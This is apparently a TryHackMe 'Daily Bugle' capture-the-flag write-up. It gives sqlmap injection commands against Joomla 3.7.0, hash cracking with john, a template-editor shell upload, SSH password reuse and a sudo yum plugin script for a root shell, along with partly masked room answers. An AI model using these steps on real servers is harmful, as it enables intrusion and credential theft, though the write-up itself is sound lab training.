Amazing TryHackMe Daily Bugle WriteUp

TryHackMe Daily Bugle WriteUp

TryHackMe Daily Bugle is a challenge to compromise a Joomla CMS account via SQLi, practice cracking hashes and escalate your privileges by taking advantage of yum.

Difficulty: Hard

TryHackMe Daily Bugle

Daily Bugle WriteUp

Access the web server, who robbed the bank?

TryHackMe Daily Bugle

Scan Target Machine with Nmap

nmap -sV -sC --script=vuln  10.10.155.246

Find Joomla Version

We have the Joomla version on nmap output but if you need to check it manually

wget http://10.10.204.53/README.txt
wget http://10.10.204.53/administrator/manifests/files/joomla.xml 

Crack Jonah Password

Crack the Hash? but where is the hash?

We have Joomla CMS with version 3.7.0 and Nmap tell us we have a public exploit, let’s search for it:

searchsploit joomla 3.7.0

Great we find one that uses SQLInjection into one vulnerable parameter.

Copy exploit to our home folder:

searchsploit -m 42033.txt
less /root/42033.txt

SQLMap Command

Verify All Databases

sqlmap -u "http://10.10.204.53/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

Read System Databases

sqlmap -u "http://10.10.204.53/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomla -p list[fullordering] --hex

Read Tables from Joomla Database

sqlmap -u "http://10.10.204.53/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomla --tables -p list[fullordering] --hex

We have 72 tables, what is the users tables?

Let’s extract #__users table data hoping to find our Jonah Password Hash

Extract data from #__users tables

sqlmap -u "http://10.10.204.53/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomla -T '#__users' -p list[fullordering] --dump --hex

Crack Jonah Password Hash

john --wordlist=/usr/share/wordlists/rockyou.txt jonah_hash.txt
john jonah_hash.txt --show

Login Joomla Administration as Jonah

http://10.10.204.53/administrator
ũsername - jonah
password - cracked from Hash

Upload Reverse Shell to Joomla

http://10.10.204.53/administrator/index.php?option=com_templates&view=template&id=506&file=L2luZGV4LnBocA%3D%3D
pwd

Investigate File System

First let’s investigate the Joomla folder

cd /var/www/html
ls -la

Great we have mysql root password, let’s check if mysql daemon is running as root:

ps -aux | grep mysql*

No success Mysql service is running as mysql user 🙁

What if thw user jjamson use the same password as mysql root user?

Let’s try to create a SSH connection as jjameson

ssh jjameson@10.10.204.53

Find User Flag

Elevate Privileges from JJameson user to Root

sudo -l

Has we can see jjameson user can execute yum command with sudo, let’s find hot to elevate privileges using yum.

cd /tmp
RFS=$(mktemp -d)
cat >$RFS/x<<EOF
[main]
plugins=1
pluginpath=$RFS
pluginconfpath=$RFS
EOF
cat >$RFS/y.conf<<EOF
[main]
enabled=1
EOF
cat >$RFS/y.py<<EOF
import os
import yum
from yum.plugins import PluginYumExit, TYPE_CORE, TYPE_INTERACTIVE
requires_api_version='2.1'
def init_hook(conduit):
  os.execl('/bin/sh','/bin/sh')
EOF

sudo yum -c $RFS/x --enableplugin=y

Answer the questions below

What is the Joomla version?

3.7.0

*Instead of using SQLMap, why not use a python script!*

What is Jonah’s cracked password?

spider*RFS*

What is the user flag?

27a260fe3cba712cfde*RFS*

What is the root flag?

eec3d53292b1821868*RFS*

GTFOBins

Exploit Joomla 3.7.0

Room nameDaily Bugle
OSLinux
DifficultyHard
Room Linktryhackme.com/room/dailybugle
CreatorTryhackme